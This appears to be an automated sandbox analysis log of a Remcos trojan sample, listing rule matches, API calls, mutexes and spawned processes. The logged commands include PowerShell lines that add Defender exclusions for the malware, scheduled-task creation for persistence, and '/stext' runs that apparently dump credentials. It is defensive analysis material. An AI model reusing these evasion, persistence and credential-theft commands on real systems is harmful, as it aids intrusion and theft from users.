                      Source: 00000000.00000002.1992230249.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000000.00000002.1992230249.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: LdSbZG1iH6.exe PID: 7276, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: LdSbZG1iH6.exe PID: 7748, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: DGlxtFUfY.exe PID: 7840, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: LdSbZG1iH6.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: DGlxtFUfY.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, zF9cdEWZ6usHDRFDVF.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, zF9cdEWZ6usHDRFDVF.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, zF9cdEWZ6usHDRFDVF.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, zF9cdEWZ6usHDRFDVF.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, wXupdxkvZLWHsqKcjX.cs | Security API names: _0020.SetAccessControl
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, wXupdxkvZLWHsqKcjX.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.LdSbZG1iH6.exe.7a50000.4.raw.unpack, wXupdxkvZLWHsqKcjX.cs | Security API names: _0020.AddAccessRule
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, wXupdxkvZLWHsqKcjX.cs | Security API names: _0020.SetAccessControl
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, wXupdxkvZLWHsqKcjX.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.LdSbZG1iH6.exe.3f98130.0.raw.unpack, wXupdxkvZLWHsqKcjX.cs | Security API names: _0020.AddAccessRule
                      Source: classification engine | Classification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@29/27@1/2
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Code function: 16_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,16_2_004182CE
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Code function: 8_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,8_2_0041798D
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Code function: 16_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,16_2_00418758
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Code function: 8_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,8_2_0040F4AF
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Code function: 8_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,8_2_0041B539
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Code function: 8_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_0041AADB
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | File created: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Mutant created: NULL
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-ZFXG9Y
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Mutant created: \Sessions\1\BaseNamedObjects\cmwJtqNjaQg
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
                      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8072
                      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6948
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7544:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8032:120:WilError_03
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | File created: C:\Users\user\AppData\Local\Temp\tmpD8DB.tmp
                      Source: LdSbZG1iH6.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: LdSbZG1iH6.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | System information queried: HandleInformation
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: DGlxtFUfY.exe, DGlxtFUfY.exe, 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                      Source: DGlxtFUfY.exe, DGlxtFUfY.exe, 00000011.00000002.2259100532.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: DGlxtFUfY.exe, 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                      Source: DGlxtFUfY.exe, DGlxtFUfY.exe, 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                      Source: DGlxtFUfY.exe, DGlxtFUfY.exe, 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: DGlxtFUfY.exe, DGlxtFUfY.exe, 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: DGlxtFUfY.exe, DGlxtFUfY.exe, 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                      Source: LdSbZG1iH6.exe | ReversingLabs: Detection: 68%
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | File read: C:\Users\user\Desktop\LdSbZG1iH6.exe
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Evasive API call chain: __getmainargs,DecisionNodes,exit
                      Source: unknown | Process created: C:\Users\user\Desktop\LdSbZG1iH6.exe "C:\Users\user\Desktop\LdSbZG1iH6.exe"
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LdSbZG1iH6.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DGlxtFUfY.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpD8DB.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Process created: C:\Users\user\Desktop\LdSbZG1iH6.exe "C:\Users\user\Desktop\LdSbZG1iH6.exe"
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "c:\program files (x86)\internet explorer\iexplore.exe"
                      Source: unknown | Process created: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe C:\Users\user\AppData\Roaming\DGlxtFUfY.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpECC1.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Process created: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe "C:\Users\user\AppData\Roaming\DGlxtFUfY.exe"
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Process created: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe C:\Users\user\AppData\Roaming\DGlxtFUfY.exe /stext "C:\Users\user\AppData\Local\Temp\xgyrrizik"
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Process created: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe C:\Users\user\AppData\Roaming\DGlxtFUfY.exe /stext "C:\Users\user\AppData\Local\Temp\ijdkrtkjyyuu"
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Process created: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe C:\Users\user\AppData\Roaming\DGlxtFUfY.exe /stext "C:\Users\user\AppData\Local\Temp\sdjcslvdtgmhffr"
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6948 -s 12
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8072 -s 1676
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LdSbZG1iH6.exe"
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DGlxtFUfY.exe"
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpD8DB.tmp"
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Process created: C:\Users\user\Desktop\LdSbZG1iH6.exe "C:\Users\user\Desktop\LdSbZG1iH6.exe"
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "c:\program files (x86)\internet explorer\iexplore.exe"
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpECC1.tmp"
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Process created: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe "C:\Users\user\AppData\Roaming\DGlxtFUfY.exe"
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Process created: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe C:\Users\user\AppData\Roaming\DGlxtFUfY.exe /stext "C:\Users\user\AppData\Local\Temp\xgyrrizik"
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Process created: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe C:\Users\user\AppData\Roaming\DGlxtFUfY.exe /stext "C:\Users\user\AppData\Local\Temp\ijdkrtkjyyuu"
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe | Process created: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe C:\Users\user\AppData\Roaming\DGlxtFUfY.exe /stext "C:\Users\user\AppData\Local\Temp\sdjcslvdtgmhffr"
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: mscoree.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: apphelp.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: version.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: wldp.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: profapi.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: cryptsp.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: rsaenh.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: dwrite.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: windowscodecs.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: amsi.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: userenv.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: msasn1.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: gpapi.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: textshaping.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: propsys.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: edputil.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: urlmon.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: iertutil.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: srvcli.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: netutils.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: sspicli.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: wintypes.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: appresolver.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: bcp47langs.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: slc.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: sppc.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exe | Section loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeSection loaded: winmm.dllJump to behavior
